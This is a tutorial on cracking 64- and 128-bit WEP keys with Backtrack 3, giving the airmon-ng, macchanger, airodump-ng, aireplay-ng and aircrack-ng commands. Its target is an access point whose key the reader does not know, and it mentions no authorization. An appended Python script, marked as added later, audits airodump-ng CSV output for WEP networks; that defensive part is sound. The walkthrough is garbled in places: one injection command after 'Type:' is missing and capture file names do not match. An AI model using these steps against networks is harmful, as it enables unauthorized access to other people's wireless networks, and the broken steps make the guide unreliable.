Cracking WEP Using Backtrack 3
This article will explain how to crack 64-bit and 128-bit WEP on many WIFI access points and routers
using Backtrack, a live Linux distribution. Your mileage may vary. The basic theory is that we want to
connect to an Access Point using WEP encryption, but we do not know the key. We will attack the
WIFI router, making it generate packets for our cracking effort, finally cracking the WEP key. I have
tested this technique on an IBM Thinkpad x60 and an Acer 5672, and the WIFI chipsets in those machines
work for sure.
Requirements:
Backtrack 3 on CD or USB
Computer with compatible 802.11 wireless card
Wireless Access point or WIFI Router using WEP encryption
I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part
out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and
do the following:
Preparing The WIFI Card
First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG
chipset issue the following commands:
modprobe -r iwl3945
modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we
must stop your WIFI card:
iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:
airmon-ng stop [device]
Then:
ifconfig [interface] down
Now we must change the MAC address of the adapter:
macchanger --mac 00:11:22:33:44:66 [device]
It's now time to start the card in monitor mode by doing:
airmon-ng start [device]
Attacking The Target
It is now time to locate a suitable WEP enabled network to work with:
airodump-ng [device]
Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now
we must start collecting data from the WIFI access point for the attack:
airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]
The above command will write the collected data to files whose names start with network.out. These files will be fed into
aircrack-ng when we are ready to crack the WEP key.
Open another shell and leave the previous command running. Now we need to generate some fake
packets to the access point to speed up the data output. Test the access point by issuing the
following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
If this command is successful we will now generate many packets on the target network so that we
can crack the KEY. Type:
This will force the access point to send out a bunch of packets which we can then use to crack the
WEP key. Check your airodump-ng shell and you should see the "#Data" column filling up with
packets.
After about 10,000-20,000 data packets you can begin cracking the WEP key. If there are no other hosts on the
target access point generating packets, you can try:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
Once you have enough packets, you begin the crack:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
The "-n 128" signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of -n
to 64.
Once the crack is successful you will be left with the KEY! Remove the colons (:) from the output and there is
your key. So there you have it.
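As an added example (not from the original article), here is a small administrator-side script that reads the CSV file airodump-ng writes beside the capture (the .csv sibling of the -01.cap file used above) and lists every network still running WEP, together with how many IVs have already been seen, so access points that need moving to WPA2 can be found and prioritised. The column layout and the sample rows are assumed and constructed here, not taken from the article's session.

```python
import csv
import io

# Constructed sample in the column layout airodump-ng writes to <prefix>-01.csv
# (assumed layout; the access-point table ends at the first blank line, after
# which the station table starts).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2008-06-01 10:00:00, 2008-06-01 10:20:00,  6,  54, WEP , WEP, OPN, -45,   900,  24100,   0.  0.  0.  0,   8, LegacyAP,
00:AA:BB:CC:DD:EE, 2008-06-01 10:00:00, 2008-06-01 10:20:00, 11,  54, WPA2, CCMP, PSK, -60,   850,      0,   0.  0.  0.  0,   9, OfficeNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Roughly the number of IVs the article says is enough for aircrack-ng to succeed.
IV_THRESHOLD = 10000


def parse_access_points(csv_text):
    """Return the access-point rows of an airodump-ng CSV as dicts keyed by header."""
    ap_section = csv_text.split("\n\n", 1)[0]          # AP table ends at the blank line
    reader = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = []
    for row in reader:
        if len(row) < len(header):                     # skip truncated or empty lines
            continue
        rows.append({h: v.strip() for h, v in zip(header, row)})
    return rows


def wep_audit(csv_text, iv_threshold=IV_THRESHOLD):
    """List WEP networks and flag those for which enough IVs have already been captured."""
    findings = []
    for ap in parse_access_points(csv_text):
        if "WEP" not in ap["Privacy"]:
            continue
        ivs = int(ap["# IV"] or 0)
        findings.append({
            "bssid": ap["BSSID"],
            "essid": ap["ESSID"],
            "channel": int(ap["channel"]),
            "ivs": ivs,
            "enough_ivs_captured": ivs >= iv_threshold,
        })
    return findings


if __name__ == "__main__":
    for f in wep_audit(SAMPLE_CSV):
        print(f"{f['bssid']} {f['essid']!r} ch{f['channel']} IVs={f['ivs']} "
              f"{'AT RISK' if f['enough_ivs_captured'] else 'monitor'}")
```

Point the script at the real file with `wep_audit(open("network.out-01.csv").read())`; a WEP network reported here is a candidate for reconfiguration regardless of the IV count, since the count only grows over time.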